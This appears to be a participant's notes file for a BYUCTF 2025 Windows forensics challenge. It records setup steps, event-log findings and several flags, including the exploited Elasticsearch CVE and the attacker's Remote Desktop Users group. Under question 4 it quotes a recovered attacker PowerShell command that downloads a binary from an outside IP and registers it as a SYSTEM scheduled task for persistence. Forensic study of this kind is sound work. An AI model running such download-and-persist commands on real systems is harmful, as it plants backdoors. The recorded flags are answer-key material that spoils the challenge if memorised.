Files
ctf/2025/byuctf/forensics/windows/notes.md
2025-06-06 03:13:31 +02:00

37 lines
2.2 KiB
Markdown

## Forensic Investigation Windows Server 2008
### Setup
Download .ova file.
Since m1 can't run x86 ova files on virtualbox extract files from .ova file with `tar -xvf <file>.ova`
Convert drive to qcow2
Reference: https://www.xmodulo.com/convert-ova-to-qcow2-linux.html
Run qemu with: `qemu-system-x86_64 -boot menu=on -m 4G -vga virtio -display cocoa <file>.qcow2`
## Questions:
### 1. What CVE did the attacker exploit to get a shell on the machine? Wrap your answer in byuctf{}. E.g. byuctf{CVE-2021-38759} Hint: Figure out what process the attacker exploited and look up vulnerabilities associated with it.
When opening sysmon logs a powershell process opens from elasticsearch. This was supspicous. The most likely exploit is one with a public CVE
byuctf{CVE-2014-3120}
### 2. Once they got in, the attacker ran some commands on the machine, but it looks like they tried to hide what they were doing. See if you can find anything interesting there
### 3. The attacker also created a new account what group did they add this account to?
According to https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/audit-user-account-management User Account creation has the Id 4720.
Opening Event Viewer and filtering for 4720 yields: 5/15/2025 7:08:28 pm User account **phasma** was created
To get the groups we have to look at Event 4732 https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4732
This yields two entries from 5/15/2025:
- BUILTIN\Users
- BUILTIN\Remote Desktop Users
=> Flag: byuctf{Remote Desktop Users}
### 4. Using their access, the attacker also deployed a C2 binary on the machine - what C2 framework was it, and what IP address was the C2 attempting to connect to?
$BINARY='C:\Windows\System32\update.exe;
$ProgressPreference = 'SilentlyContinue';
Invoke-webrequest -Uri "http://192.168.1.107:8000/update.exe" -OutFile $Binary ;
schtasks /create /tn "updates" /tr $BINARY /ru 'SYSTEM' /sc onstart /rl highest ;
schtasks /run /tn "updates"
### 5. Last but not least, the attacker put another backdoor in the machine to give themself SYSTEM privileges... what was it?